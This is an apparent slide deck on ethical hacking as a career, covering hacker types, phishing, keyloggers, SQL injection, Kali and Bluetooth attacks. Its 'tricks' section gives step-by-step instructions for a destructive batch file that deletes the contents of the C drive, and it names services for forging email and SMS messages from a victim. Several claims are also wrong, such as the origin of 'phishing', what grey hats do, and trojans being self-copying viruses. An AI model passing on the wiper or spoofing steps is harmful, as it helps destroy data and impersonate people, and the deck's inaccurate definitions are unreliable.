ETHICAL HACKING... AS A CAREER OBJECTIVE


DIFFERENCE BETWEEN SECURITY AND PROTECTION

Security and protection are extremely close concepts, though not the same.

Security measures are adopted to increase the level of protection.

The feeling of protection arises when one has enough security measures.

Security is a type of protection against external threats.

HACKER AND ETHICAL HACKER

Hacker

• Accesses a computer system or network without authorization

• Breaks the law

Ethical Hacker

• Performs most of the same activities but with the owner’s permission

• Employed by companies to perform Penetration Tests

TYPES OF HACKER

White Hat Hacker

• Good guys

• Don’t use their skills for illegal purposes

• Computer security experts who help to protect from Black Hats

Black Hat Hacker

• Bad guys

• Use their skill maliciously for personal gain

• Hack banks, steal credit cards and deface websites

Grey Hat Hacker

• A combination of White Hat and Black Hat Hackers

• Goal of grey hat hackers is to provide national security

HACKING PROCESS

• Footprinting

• Scanning

• Enumeration

• Attack and Gaining Access

• Escalating Privilege, Covering Tracks and Creating Backdoors

TYPES OF HACKING

Phishing

Key loggers

Trojans

SQL injection

Kali Linux (BackTrack)

Bluetooth hacking

PHISHING

• Pronounced "fishing"

• The word has its origin in two words, “Password Harvesting”, or fishing for passwords

• Phishing is an online form of pretexting, a kind of deception in which an attacker pretends to be someone else in order to obtain sensitive information from the victim

• Also known as "brand spoofing"

• Phishers are phishing artists

KEYLOGGING

A program or hardware device that captures every key press on the computer

Key Loggers record keystrokes:

• Legitimate use: Monitor employee productivity

• Illegal uses: Steal passwords, usernames, and other personal/corporate data

There are ways to protect yourself:

• Be aware of what’s installed on your computer

• Use caution when surfing the internet

• Keep your computer’s security software updated

TROJAN HORSE

A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user.

Type Of Trojan Horse Hacking

There are two types of Trojan Horse:

- Time Bomb and Logic Bomb

- Droppers

We need to be careful when downloading something.

We also need an anti-virus to protect our computer from being infected by a virus.

SQL INJECTION:

• SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed.

• URL based injection:

• Avoid using clear text when coding in SQL.

• If your database and webpage are constructed in a way where you can view the data, it’s open to injection.

• http://mysite.com/listauthordetails.aspx?SSN=172-32-9999

• As in prior example, you could add a drop, or other command, to alter the database.

• Passwords and other sensitive information need to be either encrypted or one-way hashed. There is no foolproof way to defend from injection, but by limiting sensitive information, you can ensure that your information is at least somewhat protected.
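The URL-based case above, as an added example that is not from the original slides: the same author lookup built by string concatenation and then with a bound parameter and a format check on the SSN. Python's sqlite3 stands in for the site's database here; the authors table, its columns, the sample rows and the crafted input are constructed for illustration.

```python
import re
import sqlite3

# Constructed input: a valid SSN followed by a quote and a tautology.
CRAFTED = "172-32-9999' OR '1'='1"
SSN_RE = re.compile(r"\d{3}-\d{2}-\d{4}")


def make_db():
    """In-memory database with constructed sample rows (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE authors (ssn TEXT PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO authors VALUES (?, ?)",
                   [("172-32-9999", "A. Writer"), ("213-46-8915", "B. Author")])
    return db


def list_author_unsafe(db, ssn):
    # Vulnerable pattern: the URL value is pasted into the SQL text, so a
    # quote character in it ends the string literal and the rest is parsed as SQL.
    sql = "SELECT name FROM authors WHERE ssn = '" + ssn + "'"
    return [row[0] for row in db.execute(sql)]


def list_author_param(db, ssn):
    # Bound parameter: the driver passes the value separately from the
    # statement, so it is only ever compared as data.
    sql = "SELECT name FROM authors WHERE ssn = ?"
    return [row[0] for row in db.execute(sql, (ssn,))]


def list_author_checked(db, ssn):
    # Strong typing on top of binding: reject anything that is not SSN-shaped
    # before the database is touched at all.
    if not SSN_RE.fullmatch(ssn):
        raise ValueError("SSN must look like 123-45-6789")
    return list_author_param(db, ssn)


if __name__ == "__main__":
    db = make_db()
    print("unsafe, normal :", list_author_unsafe(db, "172-32-9999"))
    print("unsafe, crafted:", list_author_unsafe(db, CRAFTED))
    print("bound,  crafted:", list_author_param(db, CRAFTED))
    try:
        list_author_checked(db, CRAFTED)
    except ValueError as exc:
        print("checked, crafted: rejected:", exc)
```
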

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd.

• It is used to hack any antivirus, website, etc.

BLUETOOTH ATTACK

• Why does the Bluesnarfing attack happen?

- Vendors' implementation of the OBEX protocol

• Three profiles use the OBEX protocol:

- Synchronization Profile (secure)

- File Transfer Profile (secure)

- Object Push (insecure)

[Diagram: OBEX protocol stack. Application Layer: File Transfer Profile, Object Push (Business Card), Synchronization (Phone Book, Calendar). Session Layer: OBEX. Below it: Lower Layers.]

TRICKS

• EMAIL FORGING

• SMS FORGING

• Virus commands

EMAIL FORGING

Definition:

Email Forging is the art of sending an email from the victim’s email account without knowing the password.

Working:

• ATTACKER-----Sends Forged email----- FROM VICTIM

WEBSITES: https://emkei.cz, www.anonymailer.net...

SMS FORGING

• The concept of SMS forging lies in changing the SCCP packet, which contains the sender information, prior to delivering it to the SMS gateway.

• The intruder can change the SCCP packet and can send that packet to any receiver as a spoofed SMS.

• Some websites on the net also provide this facility.

• Providing such a service is not legal, and a user who uses it may face serious consequences under the law.

• Website: http://www.spranked.com

Virus using commands on notepad

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)

3. Now, running this file will delete all the content of C Drive.

The Certified Ethical Hacker is a professional certification, provided by the International Council of E-Commerce Consultants (EC-Council).

CEH V8

QUESTIONS???